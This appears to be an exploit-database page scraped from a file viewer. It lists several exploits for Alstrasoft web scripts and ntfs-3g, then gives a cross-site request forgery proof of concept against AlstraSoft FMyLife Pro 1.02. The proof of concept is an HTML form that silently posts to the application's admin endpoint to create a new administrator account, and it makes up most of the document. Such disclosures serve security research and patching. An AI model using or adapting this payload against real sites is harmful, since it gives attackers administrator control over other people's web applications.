
7 new exploits Debian 9 ntfs-3g - Privilege Escalation ntfs-3g (Debian 9) - Privilege Escalation Alstrasoft EPay Enterprise 5.17 - SQL Injection Alstrasoft ProTaxi Enterprise 3.5 - Arbitrary File Upload Alstrasoft e-Friends 5.12 - SQL Injection Alstrasoft Video Share Enterprise 4.72 - SQL Injection Alstrasoft Flippa Clone MarketPlace Script 4.10 - Cross-Site Request Forgery (Add Admin) Alstrasoft FMyLife Pro 1.02 - Cross-Site Request Forgery (Add Admin) Alstrasoft Forum Pay Per Post Exchange Script 2.01 - SQL Injection
33 lines
No EOL
1.1 KiB
HTML
Executable file
33 lines
No EOL
1.1 KiB
HTML
Executable file
# # # # #
|
|
# Exploit Title: AlstraSoft FMyLife Pro v1.02 Script - Cross-Site Request Forgery (Add Admin)
|
|
# Google Dork: N/A
|
|
# Date: 04.02.2017
|
|
# Vendor Homepage: http://www.alstrasoft.com/
|
|
# Software Buy: http://www.alstrasoft.com/fmylife-pro.htm
|
|
# Demo: http://www.tellaboutit.com/
|
|
# Version: 1.02
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
|
# # # # #
|
|
# Exploit :
|
|
<html>
|
|
<body>
|
|
<h2>Add an Administrator</h2>
|
|
<form action="http://localhost/[PATH]/admin/" method="post">
|
|
<div id="add-admin-form">
|
|
<input type="hidden" name="action" value="add-admin" />
|
|
<label for="username">Username:</label>
|
|
<input type="text" id="username" name="admin-username" value="" />
|
|
<div class="spacer"></div>
|
|
<label for="password">Password:</label>
|
|
<input type="password" id="password" name="admin-password" value="" />
|
|
<div class="spacer"></div>
|
|
<input type="submit" name="Sumbit" name="add-admin" id="add-admin" value="Add Administrator" />
|
|
</div>
|
|
</form>
|
|
</body>
|
|
</html>
|
|
# # # # # |